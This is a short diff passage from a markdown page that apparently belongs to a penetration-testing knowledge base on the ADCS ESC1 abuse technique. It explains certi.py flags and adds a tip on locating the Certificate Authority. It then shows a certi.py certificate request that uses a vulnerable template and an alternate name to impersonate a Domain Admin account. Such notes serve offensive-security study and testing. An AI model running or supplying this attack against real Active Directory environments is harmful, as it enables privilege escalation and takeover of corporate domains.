crypt0rr/kb/content/tools/techniques/abuse-adcs/esc1/index.md

 - `-n` - 'no-pass' for use with `-k`
 - `--alt-name` - the user you want to impersonate, this will likely be a 'Domain Admin' or equal
 - `--template` - the vulnerable template name

+To find the exact Certificate Authority (CA) use `certutil –config – -ping` in CMD (<https://www.cloudservus.com/blog/how-to-find-a-certificate-authority-in-your-active-directory-environment>).

 ```plain
 $ python3 certi.py req 'offsec.nl/johndo-lowpriv@DC01PKI.offsec.nl' offsec-DC01PKI-CA -k -n --alt-name johnDomainAdmin --template UsersOffsecAD